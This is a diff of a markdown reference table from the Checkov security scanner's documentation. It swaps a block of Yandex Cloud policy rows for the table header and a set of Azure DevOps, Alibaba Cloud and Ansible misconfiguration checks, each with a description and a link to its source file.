-| 3653 | CKV_YC_1                 | resource                         | yandex_mdb_mysql_cluster                                                                         | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3654 | CKV_YC_1                 | resource                         | yandex_mdb_postgresql_cluster                                                                    | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3655 | CKV_YC_1                 | resource                         | yandex_mdb_redis_cluster                                                                         | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3656 | CKV_YC_1                 | resource                         | yandex_mdb_sqlserver_cluster                                                                     | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3657 | CKV_YC_2                 | resource                         | yandex_compute_instance                                                                          | Ensure compute instance does not have public IP.                                                                                                                                                         | Terraform               | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py)                                                                             |
-| 3658 | CKV_YC_3                 | resource                         | yandex_storage_bucket                                                                            | Ensure storage bucket is encrypted.                                                                                                                                                                      | Terraform               | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py)                                                     |
-| 3659 | CKV_YC_4                 | resource                         | yandex_compute_instance                                                                          | Ensure compute instance does not have serial console enabled.                                                                                                                                            | Terraform               | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py)                                                                   |
-| 3660 | CKV_YC_5                 | resource                         | yandex_kubernetes_cluster                                                                        | Ensure Kubernetes cluster does not have public IP address.                                                                                                                                               | Terraform               | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py)                                                                                         |
-| 3661 | CKV_YC_6                 | resource                         | yandex_kubernetes_node_group                                                                     | Ensure Kubernetes cluster node group does not have public IP addresses.                                                                                                                                  | Terraform               | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py)                                                                       |
-| 3662 | CKV_YC_7                 | resource                         | yandex_kubernetes_cluster                                                                        | Ensure Kubernetes cluster auto-upgrade is enabled.                                                                                                                                                       | Terraform               | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py)                                                                                   |
-| 3663 | CKV_YC_8                 | resource                         | yandex_kubernetes_node_group                                                                     | Ensure Kubernetes node group auto-upgrade is enabled.                                                                                                                                                    | Terraform               | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py)                                                                 |
-| 3664 | CKV_YC_9                 | resource                         | yandex_kms_symmetric_key                                                                         | Ensure KMS symmetric key is rotated.                                                                                                                                                                     | Terraform               | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py)                                                                 |
-| 3665 | CKV_YC_10                | resource                         | yandex_kubernetes_cluster                                                                        | Ensure etcd database is encrypted with KMS key.                                                                                                                                                          | Terraform               | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py)                                                                       |
-| 3666 | CKV_YC_11                | resource                         | yandex_compute_instance                                                                          | Ensure security group is assigned to network interface.                                                                                                                                                  | Terraform               | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py)                                                                   |
-| 3667 | CKV_YC_12                | resource                         | yandex_mdb_clickhouse_cluster                                                                    | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3668 | CKV_YC_12                | resource                         | yandex_mdb_elasticsearch_cluster                                                                 | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3669 | CKV_YC_12                | resource                         | yandex_mdb_greenplum_cluster                                                                     | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3670 | CKV_YC_12                | resource                         | yandex_mdb_kafka_cluster                                                                         | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3671 | CKV_YC_12                | resource                         | yandex_mdb_mongodb_cluster                                                                       | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3672 | CKV_YC_12                | resource                         | yandex_mdb_mysql_cluster                                                                         | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3673 | CKV_YC_12                | resource                         | yandex_mdb_postgresql_cluster                                                                    | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3674 | CKV_YC_12                | resource                         | yandex_mdb_sqlserver_cluster                                                                     | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 3675 | CKV_YC_13                | resource                         | yandex_resourcemanager_cloud_iam_binding                                                         | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform               | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                 |
-| 3676 | CKV_YC_13                | resource                         | yandex_resourcemanager_cloud_iam_member                                                          | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform               | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                 |
-| 3677 | CKV_YC_14                | resource                         | yandex_kubernetes_cluster                                                                        | Ensure security group is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform               | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py)                                                                               |
-| 3678 | CKV_YC_15                | resource                         | yandex_kubernetes_node_group                                                                     | Ensure security group is assigned to Kubernetes node group.                                                                                                                                              | Terraform               | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py)                                                             |
-| 3679 | CKV_YC_16                | resource                         | yandex_kubernetes_cluster                                                                        | Ensure network policy is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform               | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py)                                                                               |
-| 3680 | CKV_YC_17                | resource                         | yandex_storage_bucket                                                                            | Ensure storage bucket does not have public access permissions.                                                                                                                                           | Terraform               | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py)                                                 |
-| 3681 | CKV_YC_18                | resource                         | yandex_compute_instance_group                                                                    | Ensure compute instance group does not have public IP.                                                                                                                                                   | Terraform               | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py)                                                       |
-| 3682 | CKV_YC_19                | resource                         | yandex_vpc_security_group                                                                        | Ensure security group does not contain allow-all rules.                                                                                                                                                  | Terraform               | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py)                                                               |
-| 3683 | CKV_YC_20                | resource                         | yandex_vpc_security_group_rule                                                                   | Ensure security group rule is not allow-all.                                                                                                                                                             | Terraform               | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py)                                                       |
-| 3684 | CKV_YC_21                | resource                         | yandex_organizationmanager_organization_iam_binding                                              | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform               | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                   |
-| 3685 | CKV_YC_21                | resource                         | yandex_organizationmanager_organization_iam_member                                               | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform               | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                   |
-| 3686 | CKV_YC_22                | resource                         | yandex_compute_instance_group                                                                    | Ensure compute instance group has security group assigned.                                                                                                                                               | Terraform               | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py)                                             |
-| 3687 | CKV_YC_23                | resource                         | yandex_resourcemanager_folder_iam_binding                                                        | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform               | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                               |
-| 3688 | CKV_YC_23                | resource                         | yandex_resourcemanager_folder_iam_member                                                         | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform               | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                               |
-| 3689 | CKV_YC_24                | resource                         | yandex_organizationmanager_organization_iam_binding                                              | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 3690 | CKV_YC_24                | resource                         | yandex_organizationmanager_organization_iam_member                                               | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 3691 | CKV_YC_24                | resource                         | yandex_resourcemanager_cloud_iam_binding                                                         | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 3692 | CKV_YC_24                | resource                         | yandex_resourcemanager_cloud_iam_member                                                          | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 3693 | CKV_YC_24                | resource                         | yandex_resourcemanager_folder_iam_binding                                                        | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 3694 | CKV_YC_24                | resource                         | yandex_resourcemanager_folder_iam_member                                                         | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
+|      | Id                       | Type                             | Entity                                                                                           | Policy                                                                                                                                                                                                   | IaC                     | Resource Link                                                                                                                                                                                                                    |
+|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+|    0 | CKV2_ADO_1               | resource                         | azuredevops_branch_policy_min_reviewers                                                          | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform               | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                                 |
+|    1 | CKV2_ADO_1               | resource                         | azuredevops_git_repository                                                                       | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform               | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                                 |
+|    2 | CKV_ALI_1                | resource                         | alicloud_oss_bucket                                                                              | Alibaba Cloud OSS bucket accessible to public                                                                                                                                                            | Terraform               | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py)                                                                                            |
+|    3 | CKV_ALI_2                | resource                         | alicloud_security_group_rule                                                                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py)                                                      |
+|    4 | CKV_ALI_3                | resource                         | alicloud_security_group_rule                                                                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py)                                                  |
+|    5 | CKV_ALI_4                | resource                         | alicloud_actiontrail_trail                                                                       | Ensure Action Trail Logging for all regions                                                                                                                                                              | Terraform               | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py)                                                                          |
+|    6 | CKV_ALI_5                | resource                         | alicloud_actiontrail_trail                                                                       | Ensure Action Trail Logging for all events                                                                                                                                                               | Terraform               | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py)                                                                            |
+|    7 | CKV_ALI_6                | resource                         | alicloud_oss_bucket                                                                              | Ensure OSS bucket is encrypted with Customer Master Key                                                                                                                                                  | Terraform               | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py)                                                                        |
+|    8 | CKV_ALI_7                | resource                         | alicloud_disk                                                                                    | Ensure disk is encrypted                                                                                                                                                                                 | Terraform               | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py)                                                                                            |
+|    9 | CKV_ALI_8                | resource                         | alicloud_disk                                                                                    | Ensure Disk is encrypted with Customer Master Key                                                                                                                                                        | Terraform               | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py)                                                                                  |
+|   10 | CKV_ALI_9                | resource                         | alicloud_db_instance                                                                             | Ensure database instance is not public                                                                                                                                                                   | Terraform               | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py)                                                                                                    |
+|   11 | CKV_ALI_10               | resource                         | alicloud_oss_bucket                                                                              | Ensure OSS bucket has versioning enabled                                                                                                                                                                 | Terraform               | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py)                                                                                    |
+|   12 | CKV_ALI_11               | resource                         | alicloud_oss_bucket                                                                              | Ensure OSS bucket has transfer Acceleration enabled                                                                                                                                                      | Terraform               | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py)                                                                |
+|   13 | CKV_ALI_12               | resource                         | alicloud_oss_bucket                                                                              | Ensure the OSS bucket has access logging enabled                                                                                                                                                         | Terraform               | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py)                                                                                    |
+|   14 | CKV_ALI_13               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform               | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py)                                                                            |
+|   15 | CKV_ALI_14               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one number                                                                                                                                                  | Terraform               | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py)                                                                            |
+|   16 | CKV_ALI_15               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one symbol                                                                                                                                                  | Terraform               | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py)                                                                            |
+|   17 | CKV_ALI_16               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform               | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py)                                                                    |
+|   18 | CKV_ALI_17               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform               | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py)                                                          |
+|   19 | CKV_ALI_18               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy prevents password reuse                                                                                                                                                       | Terraform               | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py)                                                                              |
+|   20 | CKV_ALI_19               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform               | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py)                                                              |
+|   21 | CKV_ALI_20               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance uses SSL                                                                                                                                                                             | Terraform               | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py)                                                                                              |
+|   22 | CKV_ALI_21               | resource                         | alicloud_api_gateway_api                                                                         | Ensure API Gateway API Protocol HTTPS                                                                                                                                                                    | Terraform               | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py)                                                                            |
+|   23 | CKV_ALI_22               | resource                         | alicloud_db_instance                                                                             | Ensure Transparent Data Encryption is Enabled on instance                                                                                                                                                | Terraform               | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py)                                                    |
+|   24 | CKV_ALI_23               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure Ram Account Password Policy Max Login Attempts not > 5                                                                                                                                            | Terraform               | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py)                                                                        |
+|   25 | CKV_ALI_24               | resource                         | alicloud_ram_security_preference                                                                 | Ensure RAM enforces MFA                                                                                                                                                                                  | Terraform               | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py)                                                                                |
+|   26 | CKV_ALI_25               | resource                         | alicloud_db_instance                                                                             | Ensure RDS Instance SQL Collector Retention Period should be greater than 180                                                                                                                            | Terraform               | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py)                                                                                                  |
+|   27 | CKV_ALI_26               | resource                         | alicloud_cs_kubernetes                                                                           | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies                                                                                                                         | Terraform               | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py)                                                                          |
+|   28 | CKV_ALI_27               | resource                         | alicloud_kms_key                                                                                 | Ensure KMS Key Rotation is enabled                                                                                                                                                                       | Terraform               | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py)                                                                            |
+|   29 | CKV_ALI_28               | resource                         | alicloud_kms_key                                                                                 | Ensure KMS Keys are enabled                                                                                                                                                                              | Terraform               | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py)                                                                                            |
+|   30 | CKV_ALI_29               | resource                         | alicloud_alb_acl_entry_attachment                                                                | Alibaba ALB ACL does not restrict Access                                                                                                                                                                 | Terraform               | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py)                                                                                  |
+|   31 | CKV_ALI_30               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance auto upgrades for minor versions                                                                                                                                                     | Terraform               | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py)                                                                              |
+|   32 | CKV_ALI_31               | resource                         | alicloud_cs_kubernetes_node_pool                                                                 | Ensure K8s nodepools are set to auto repair                                                                                                                                                              | Terraform               | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py)                                                                                |
+|   33 | CKV_ALI_32               | resource                         | alicloud_ecs_launch_template                                                                     | Ensure launch template data disks are encrypted                                                                                                                                                          | Terraform               | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py)                                                            |
+|   34 | CKV_ALI_33               | resource                         | alicloud_slb_tls_cipher_policy                                                                   | Alibaba Cloud Cypher Policy are secure                                                                                                                                                                   | Terraform               | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py)                                                                                  |
+|   35 | CKV_ALI_35               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance has log_duration enabled                                                                                                                                                             | Terraform               | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py)                                                                              |
+|   36 | CKV_ALI_36               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance has log_disconnections enabled                                                                                                                                                       | Terraform               | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py)                                                                  |
+|   37 | CKV_ALI_37               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance has log_connections enabled                                                                                                                                                          | Terraform               | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py)                                                                        |
+|   38 | CKV_ALI_38               | resource                         | alicloud_log_audit                                                                               | Ensure log audit is enabled for RDS                                                                                                                                                                      | Terraform               | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py)                                                                                      |
+|   39 | CKV_ALI_41               | resource                         | alicloud_mongodb_instance                                                                        | Ensure MongoDB is deployed inside a VPC                                                                                                                                                                  | Terraform               | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py)                                                                                          |
+|   40 | CKV_ALI_42               | resource                         | alicloud_mongodb_instance                                                                        | Ensure Mongodb instance uses SSL                                                                                                                                                                         | Terraform               | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py)                                                                                      |
+|   41 | CKV_ALI_43               | resource                         | alicloud_mongodb_instance                                                                        | Ensure MongoDB instance is not public                                                                                                                                                                    | Terraform               | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py)                                                                                            |
+|   42 | CKV_ALI_44               | resource                         | alicloud_mongodb_instance                                                                        | Ensure MongoDB has Transparent Data Encryption Enabled                                                                                                                                                   | Terraform               | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py)                                            |
+|   43 | CKV_ANSIBLE_1            | resource                         | [?"ansible.builtin.uri" != null][]                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   44 | CKV_ANSIBLE_1            | resource                         | [?"uri" != null][]                                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   45 | CKV_ANSIBLE_1            | resource                         | [].block[?"ansible.builtin.uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   46 | CKV_ANSIBLE_1            | resource                         | [].block[?"uri" != null][]                                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   47 | CKV_ANSIBLE_1            | resource                         | [].block[].block[?"ansible.builtin.uri" != null][]                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   48 | CKV_ANSIBLE_1            | resource                         | [].block[].block[?"uri" != null][]                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   49 | CKV_ANSIBLE_1            | resource                         | [].block[].block[].block[?"ansible.builtin.uri" != null][]                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
